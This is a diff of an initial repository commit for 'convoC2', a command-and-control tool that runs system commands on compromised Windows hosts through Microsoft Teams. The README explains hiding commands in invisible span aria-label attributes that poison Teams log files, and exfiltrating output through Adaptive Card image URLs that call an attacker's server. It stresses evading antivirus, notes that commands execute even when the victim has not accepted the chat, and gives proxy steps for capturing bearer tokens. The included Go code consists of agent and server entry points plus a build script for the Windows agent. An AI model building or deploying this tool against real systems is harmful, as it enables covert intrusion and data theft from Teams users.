Opening repo

Author: cxnturi0n

.gitignore

@@ -0,0 +1 @@
+/build/

LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2024 Fabio Cinicolo
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

README.md

@@ -0,0 +1,103 @@
+<h1 align="center">convoC2</h1>
+
+## Table of Contents
+- [Introduction](#introduction)
+- [Demo](#demo)
+- [Usage](#usage)
+- [Requirements](#requirements)
+- [Inspiration](#inspiration)
+- [Contribute](#contribute)
+
+## Introduction
+Command and Control infrastructure that allows Red Teamers to execute system commands on compromised hosts through Microsoft Teams.  
+It infiltrates data into hidden span tags in Microsoft Teams messages and exfiltrates data by embedding command outputs in Adaptive Cards image URLs, triggering out-of-bound requests to a C2 server.  
+The lack of direct communication between the victim and the attacker, combined with the fact that the victim only sends http requests to Microsoft servers and antiviruses don't look into MS Teams log files, makes detection more difficult.  
+
+![convoC2-Architecture](https://github.com/user-attachments/assets/d126a4cb-dc62-4a18-8b89-3501a4319d6e)
+
+## Demo
+The following video demonstrates the use of the server to control two compromised hosts: one running the new Teams on Windows 11 and the other running the old Teams on Windows 10. In the first case, the attacker is not in the same org as the victim.
+
+https://github.com/user-attachments/assets/d9fcccc1-de73-49cd-aaa7-df53303dbc6a
+
+**Note:** In the first case the victim already accepted the chat with the external attacker, but in a real scenario where the attacker starts the chat with the victim for the first time, the victim would need to confirm the chat with the attacker. This is not a problem: because messages are being cached in the log file anyways, the **commands are received and executed even if the victim has not visualized or accepted the chat yet**.
+
+## Usage
+**Server**
+```
+root@convoC2-server-VPS:~# ./convoC2_server_amd64 -h
+Usage of convoC2 server:
+  -t, --msgTimeout  How much to wait for command output (default 30 s)
+  -b, --bindIp      Bind IP address (default 0.0.0.0)
+```
+**Agent**
+```
+C:\Windows>convoC2_agent.exe -h
+Usage of convoC2 agent:
+  -v, --verbose   Verbose logging (default false)
+  -s, --server    C2 server URL (i.e. http://10.11.12.13/)
+  -t, --timeout   Teams log file polling timeout [s] (default 1)
+  -w, --webhook   Teams Webhook POST URL
+  -r, --regex     Regex to match command (default "<span[^>]*aria-label=\"([^\"]*)\"[^>]*></span>")
+```
+
+## Requirements
+To get it working, you will need to set up a few things:
+- [**Create Teams channel with Workflow Incoming Webhook**](#Create-Teams-channel-with-Workflow-Incoming-Webhook): this is the place where the adaptive cards containing the output will be received. **Note**: **It is important to keep a browser window with this channel opened while using the server**, otherwise the server will not receive messages from the agents.
+
+![WebhookChannel](https://github.com/user-attachments/assets/ea65daad-9274-4574-835b-107f468a1d6e)
+
+- [**Fetch Ids and Auth Token**](#Fetch-Ids-And-Auth-Token): Teams initializes a chat with a POST to `https://teams.microsoft.com/api/chatsvc/emea/v1/threads` with the unique ids of the victim and the attacker in the body. In the response, the threadId will be returned in the path of the Location header url.
+  The Bearer token of the same request is used to authenticate to `https://teams.microsoft.com/api/chatsvc/emea/v1/users/ME/conversations/<threadId>/messages`, which is the endpoint for sending messages. So we just need to grab these three things and the server will take care of the rest.
+- Make sure you have a public facing host allowing inbound HTTP traffic on port 80.
+- Teams needs to be running on the victim host, in the background is fine too.
+
+After starting the server you can receive new agents and control them, using the data previously obtained for authentication. Check the demo out for a usage example.
+
+### Create Teams channel with Workflow Incoming Webhook
+First of all, you will need to create a Teams channel.  
+
+![CreateTeams](https://github.com/user-attachments/assets/8f4da165-4c94-4685-b06c-a938cde8cf90)  
+
+Right click on the three dots, then click on "Workflows".    
+
+![CreateTeams_1](https://github.com/user-attachments/assets/50c0fe37-d81c-4fc6-b9ec-81a287cbcedd)  
+
+In the search bar type "Webhook" and click on the "Post to a channel when a webhook request is received".  
+
+![CreateTeams_5](https://github.com/user-attachments/assets/3f7d7221-cc84-457b-9057-610e60944c61)  
+
+Continue with the default settings and finally copy the url.  
+
+![Create_Teams_6](https://github.com/user-attachments/assets/45030146-3575-4588-9fac-ee2bb6079bbc)
+
+
+### Fetch Ids and Auth Token
+Start by looking for the victim.  
+
+![GetOrgIds](https://github.com/user-attachments/assets/c75b47e3-5503-473b-8be6-a04d041e9422)  
+
+After selecting the victim account, with the web proxy intercepting the requests, you can send a dummy message.  
+
+![GetOrgIds_1](https://github.com/user-attachments/assets/76533c54-2c71-4d0d-94dc-5d638a33242c)  
+
+Save the two ids present in the `api/chatsvc/emea/v1/threads` request then DROP the request. The auth token will be the Bearer token of the same request.  
+
+![GetOrgIds_2](https://github.com/user-attachments/assets/b0f9d9bc-df2d-4527-8a87-301babd505b4)
+
+## Inspiration
+This infrastructure was inspired by the [Teams GIFShell research](https://medium.com/@bobbyrsec/gifshell-covert-attack-chain-and-c2-utilizing-microsoft-teams-gifs-1618c4e64ed7) made by [Bobbyrsec](https://www.linkedin.com/in/bobby-rauch/).  
+Initially my purpose was to replicate the issue, but the solution appeared to be partially fixed. The research involved injecting commands into Base64-encoded GIFs, but these were no longer being displayed correctly: an icon of corrupted image would appear in the chat instead, resulting in the victim protentially starting to suspect.  
+After testing various methods, I noticed that it was possible to **embed commands directly into messages rather than in GIFs or images**: sending multiple images is more likely to raise suspicion compared to sending simple messages, right?
+Initially I considered embedding commands in tags like `<script>`, `<meta>`, or custom tags, but all were filtered out. Eventually, embedding commands in the `aria-label` attribute of `<span>` tags with `display:none` was successful: the victim would only see the message, but the hidden command would actually poison the Teams log file.  
+
+![TeamsLogPoisoning](https://github.com/user-attachments/assets/b602ef7f-fabc-42a0-bd68-6b7d7f152a86)
+
+The server TUI has been developed using the awesome Go [BubbleTea framework](https://github.com/charmbracelet/bubbletea).
+
+## Contribute
+If you find bugs or want to improve the project feel free to open a pull request and I will be glad to review and eventually merge your changes.
+Short term todos are:
+- Message AES encryption
+- Keepalive to detect when agent is dead
+- Powershell version of the Agent

cmd/agent/main.go

@@ -0,0 +1,51 @@
+package main
+
+import (
+	"flag"
+	"fmt"
+	"os"
+	"regexp"
+
+	"github.com/cxnturi0n/convoC2/pkg/agent"
+)
+
+var (
+	verbose      bool
+	serverURL    string
+	timeout      int
+	webhookURL   string
+	commandRegex string
+)
+
+func init() {
+	flag.BoolVar(&verbose, "v", false, "")
+	flag.StringVar(&serverURL, "s", "", "") // Insert in third parameter if you want to hardcode serverURL
+	flag.IntVar(&timeout, "t", 1, "")
+	flag.StringVar(&webhookURL, "w", "", "") // Insert in third parameter if you want to hardcode webhookURL
+	flag.StringVar(&commandRegex, "r", `<span[^>]*aria-label="([^"]*)"[^>]*></span>`, "") // For now use the default because server only supports aria-label injection
+
+	flag.BoolVar(&verbose, "verbose", false, "")
+	flag.StringVar(&serverURL, "server", "", "") // Insert in third parameter if you want to hardcode serverURL
+	flag.IntVar(&timeout, "timeout", 1, "")
+	flag.StringVar(&webhookURL, "webhook", "", "") // Insert in third parameter if you want to hardcode webhookURL
+	flag.StringVar(&commandRegex, "regex", `<span[^>]*aria-label="([^"]*)"[^>]*></span>`, "") // For now use the default because server only supports aria-label injection
+}
+
+func main() {
+	flag.Usage = func() {
+		fmt.Fprintf(os.Stderr, "Usage of convoC2 agent:\n")
+		fmt.Fprintf(os.Stderr, "  -v, --verbose   Verbose logging (default false)\n")
+		fmt.Fprintf(os.Stderr, "  -s, --server    C2 server URL (i.e. http://10.11.12.13/)\n")
+		fmt.Fprintf(os.Stderr, "  -t, --timeout   Teams log file polling timeout [s] (default 1)\n")
+		fmt.Fprintf(os.Stderr, "  -w, --webhook   Teams Webhook POST URL\n")
+		fmt.Fprintf(os.Stderr, `  -r, --regex     Regex to match command (default "<span[^>]*aria-label=\"([^\"]*)\"[^>]*></span>")`)
+	}
+
+	flag.Parse()
+
+	err := agent.Start(verbose, serverURL, timeout, webhookURL, regexp.MustCompile(commandRegex))
+	if err != nil {
+		fmt.Fprintln(os.Stderr, "Agent failed to run:", err)
+		os.Exit(1)
+	}
+}

cmd/server/main.go

@@ -0,0 +1,36 @@
+package main
+
+import (
+	"flag"
+	"fmt"
+	"os"
+
+	tea "github.com/charmbracelet/bubbletea"
+	"github.com/cxnturi0n/convoC2/pkg/server"
+	"github.com/cxnturi0n/convoC2/pkg/server/tui"
+)
+
+func init() {
+	flag.IntVar(&server.MsgTimeout, "t", 30, "")
+	flag.StringVar(&server.BindIp, "b", "0.0.0.0", "")
+
+	flag.IntVar(&server.MsgTimeout, "msgTimeout", 30, "")
+	flag.StringVar(&server.BindIp, "bindIp", "0.0.0.0", "")
+}
+
+func main() {
+	flag.Usage = func() {
+		fmt.Fprintf(os.Stderr, "Usage of convoC2 server:\n")
+		fmt.Fprintf(os.Stderr, "  -t, --msgTimeout  How much to wait for command output (default 30 s)\n")
+		fmt.Fprintf(os.Stderr, "  -b, --bindIp      Bind IP address (default 0.0.0.0)\n")
+	}
+
+	flag.Parse()
+
+	p := tea.NewProgram(tui.InitialModel(), tea.WithAltScreen())
+
+	if _, err := p.Run(); err != nil {
+		fmt.Fprintf(os.Stderr, "Error: %v\n", err)
+		os.Exit(1)
+	}
+}

go.mod

@@ -0,0 +1,30 @@
+module github.com/cxnturi0n/convoC2
+
+go 1.22.4
+
+require (
+	github.com/charmbracelet/bubbles v0.20.0
+	github.com/charmbracelet/bubbletea v1.1.1
+	github.com/charmbracelet/lipgloss v0.13.0
+)
+
+require (
+	github.com/atotto/clipboard v0.1.4 // indirect
+	github.com/aymanbagabas/go-osc52/v2 v2.0.1 // indirect
+	github.com/charmbracelet/x/ansi v0.2.3 // indirect
+	github.com/charmbracelet/x/term v0.2.0 // indirect
+	github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f // indirect
+	github.com/lucasb-eyer/go-colorful v1.2.0 // indirect
+	github.com/mattn/go-isatty v0.0.20 // indirect
+	github.com/mattn/go-localereader v0.0.1 // indirect
+	github.com/mattn/go-runewidth v0.0.16 // indirect
+	github.com/muesli/ansi v0.0.0-20230316100256-276c6243b2f6 // indirect
+	github.com/muesli/cancelreader v0.2.2 // indirect
+	github.com/muesli/termenv v0.15.2 // indirect
+	github.com/rivo/uniseg v0.4.7 // indirect
+	github.com/sahilm/fuzzy v0.1.1 // indirect
+	golang.org/x/sync v0.8.0 // indirect
+	golang.org/x/sys v0.24.0 // indirect
+	golang.org/x/text v0.3.8 // indirect
+)
+

go.sum

@@ -0,0 +1,46 @@
+github.com/atotto/clipboard v0.1.4 h1:EH0zSVneZPSuFR11BlR9YppQTVDbh5+16AmcJi4g1z4=
+github.com/atotto/clipboard v0.1.4/go.mod h1:ZY9tmq7sm5xIbd9bOK4onWV4S6X0u6GY7Vn0Yu86PYI=
+github.com/aymanbagabas/go-osc52/v2 v2.0.1 h1:HwpRHbFMcZLEVr42D4p7XBqjyuxQH5SMiErDT4WkJ2k=
+github.com/aymanbagabas/go-osc52/v2 v2.0.1/go.mod h1:uYgXzlJ7ZpABp8OJ+exZzJJhRNQ2ASbcXHWsFqH8hp8=
+github.com/charmbracelet/bubbles v0.20.0 h1:jSZu6qD8cRQ6k9OMfR1WlM+ruM8fkPWkHvQWD9LIutE=
+github.com/charmbracelet/bubbles v0.20.0/go.mod h1:39slydyswPy+uVOHZ5x/GjwVAFkCsV8IIVy+4MhzwwU=
+github.com/charmbracelet/bubbletea v1.1.1 h1:KJ2/DnmpfqFtDNVTvYZ6zpPFL9iRCRr0qqKOCvppbPY=
+github.com/charmbracelet/bubbletea v1.1.1/go.mod h1:9Ogk0HrdbHolIKHdjfFpyXJmiCzGwy+FesYkZr7hYU4=
+github.com/charmbracelet/lipgloss v0.13.0 h1:4X3PPeoWEDCMvzDvGmTajSyYPcZM4+y8sCA/SsA3cjw=
+github.com/charmbracelet/lipgloss v0.13.0/go.mod h1:nw4zy0SBX/F/eAO1cWdcvy6qnkDUxr8Lw7dvFrAIbbY=
+github.com/charmbracelet/x/ansi v0.2.3 h1:VfFN0NUpcjBRd4DnKfRaIRo53KRgey/nhOoEqosGDEY=
+github.com/charmbracelet/x/ansi v0.2.3/go.mod h1:dk73KoMTT5AX5BsX0KrqhsTqAnhZZoCBjs7dGWp4Ktw=
+github.com/charmbracelet/x/term v0.2.0 h1:cNB9Ot9q8I711MyZ7myUR5HFWL/lc3OpU8jZ4hwm0x0=
+github.com/charmbracelet/x/term v0.2.0/go.mod h1:GVxgxAbjUrmpvIINHIQnJJKpMlHiZ4cktEQCN6GWyF0=
+github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f h1:Y/CXytFA4m6baUTXGLOoWe4PQhGxaX0KpnayAqC48p4=
+github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f/go.mod h1:vw97MGsxSvLiUE2X8qFplwetxpGLQrlU1Q9AUEIzCaM=
+github.com/kylelemons/godebug v1.1.0 h1:RPNrshWIDI6G2gRW9EHilWtl7Z6Sb1BR0xunSBf0SNc=
+github.com/kylelemons/godebug v1.1.0/go.mod h1:9/0rRGxNHcop5bhtWyNeEfOS8JIWk580+fNqagV/RAw=
+github.com/lucasb-eyer/go-colorful v1.2.0 h1:1nnpGOrhyZZuNyfu1QjKiUICQ74+3FNCN69Aj6K7nkY=
+github.com/lucasb-eyer/go-colorful v1.2.0/go.mod h1:R4dSotOR9KMtayYi1e77YzuveK+i7ruzyGqttikkLy0=
+github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY=
+github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
+github.com/mattn/go-localereader v0.0.1 h1:ygSAOl7ZXTx4RdPYinUpg6W99U8jWvWi9Ye2JC/oIi4=
+github.com/mattn/go-localereader v0.0.1/go.mod h1:8fBrzywKY7BI3czFoHkuzRoWE9C+EiG4R1k4Cjx5p88=
+github.com/mattn/go-runewidth v0.0.16 h1:E5ScNMtiwvlvB5paMFdw9p4kSQzbXFikJ5SQO6TULQc=
+github.com/mattn/go-runewidth v0.0.16/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w=
+github.com/muesli/ansi v0.0.0-20230316100256-276c6243b2f6 h1:ZK8zHtRHOkbHy6Mmr5D264iyp3TiX5OmNcI5cIARiQI=
+github.com/muesli/ansi v0.0.0-20230316100256-276c6243b2f6/go.mod h1:CJlz5H+gyd6CUWT45Oy4q24RdLyn7Md9Vj2/ldJBSIo=
+github.com/muesli/cancelreader v0.2.2 h1:3I4Kt4BQjOR54NavqnDogx/MIoWBFa0StPA8ELUXHmA=
+github.com/muesli/cancelreader v0.2.2/go.mod h1:3XuTXfFS2VjM+HTLZY9Ak0l6eUKfijIfMUZ4EgX0QYo=
+github.com/muesli/termenv v0.15.2 h1:GohcuySI0QmI3wN8Ok9PtKGkgkFIk7y6Vpb5PvrY+Wo=
+github.com/muesli/termenv v0.15.2/go.mod h1:Epx+iuz8sNs7mNKhxzH4fWXGNpZwUaJKRS1noLXviQ8=
+github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc=
+github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ=
+github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88=
+github.com/sahilm/fuzzy v0.1.1 h1:ceu5RHF8DGgoi+/dR5PsECjCDH1BE3Fnmpo7aVXOdRA=
+github.com/sahilm/fuzzy v0.1.1/go.mod h1:VFvziUEIMCrT6A6tw2RFIXPXXmzXbOsSHF0DOI8ZK9Y=
+golang.org/x/sync v0.8.0 h1:3NFvSEYkUoMifnESzZl15y791HH1qU2xm6eCJU5ZPXQ=
+golang.org/x/sync v0.8.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk=
+golang.org/x/sys v0.0.0-20210809222454-d867a43fc93e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.24.0 h1:Twjiwq9dn6R1fQcyiK+wQyHWfaz/BJB+YIpzU/Cv3Xg=
+golang.org/x/sys v0.24.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
+golang.org/x/text v0.3.8 h1:nAL+RVCQ9uMn3vJZbV+MRnydTJFPf8qqY42YiA6MrqY=
+golang.org/x/text v0.3.8/go.mod h1:E6s5w1FMmriuDzIBO73fBruAKo1PCIq6d2Q6DHfQ8WQ=
+

makefile

@@ -0,0 +1,44 @@
+AGENT_PATH = cmd/agent/main.go
+SERVER_PATH = cmd/server/main.go
+
+BUILD_DIR = build
+AGENT_BUILD_DIR = $(BUILD_DIR)/agent
+SERVER_BUILD_DIR = $(BUILD_DIR)/server
+
+.PHONY: all
+all: agent server_amd64 server_arm64 compress
+
+$(BUILD_DIR):
+	mkdir -p $(BUILD_DIR)
+$(AGENT_BUILD_DIR):
+	mkdir -p $(AGENT_BUILD_DIR)
+$(SERVER_BUILD_DIR):
+	mkdir -p $(SERVER_BUILD_DIR)
+
+.PHONY: agent
+agent: $(AGENT_BUILD_DIR)
+	GOOS=windows GOARCH=amd64 go build -o $(AGENT_BUILD_DIR)/convoC2_agent.exe $(AGENT_PATH)
+	@echo "Built agent for Windows (amd64)"
+
+.PHONY: server_amd64
+server_amd64: $(SERVER_BUILD_DIR)
+	GOOS=linux GOARCH=amd64 go build -o $(SERVER_BUILD_DIR)/convoC2_server_amd64 $(SERVER_PATH)
+	@echo "Built server for Linux (amd64)"
+
+.PHONY: server_arm64
+server_arm64: $(SERVER_BUILD_DIR)
+	GOOS=linux GOARCH=arm64 go build -o $(SERVER_BUILD_DIR)/convoC2_server_arm64 $(SERVER_PATH)
+	@echo "Built server for Linux (arm64)"
+
+.PHONY: compress
+compress: agent server_amd64 server_arm64
+	@echo "Compressing build outputs..."
+	tar -czf $(AGENT_BUILD_DIR)/convoC2_agent.tar.gz -C $(AGENT_BUILD_DIR) convoC2_agent.exe
+	tar -czf $(SERVER_BUILD_DIR)/convoC2_server_amd64.tar.gz -C $(SERVER_BUILD_DIR) convoC2_server_amd64
+	tar -czf $(SERVER_BUILD_DIR)/convoC2_server_arm64.tar.gz -C $(SERVER_BUILD_DIR) convoC2_server_arm64
+	@echo "Compression complete"
+
+.PHONY: clean
+clean:
+	rm -rf $(BUILD_DIR)
+	@echo "Cleaned build directories"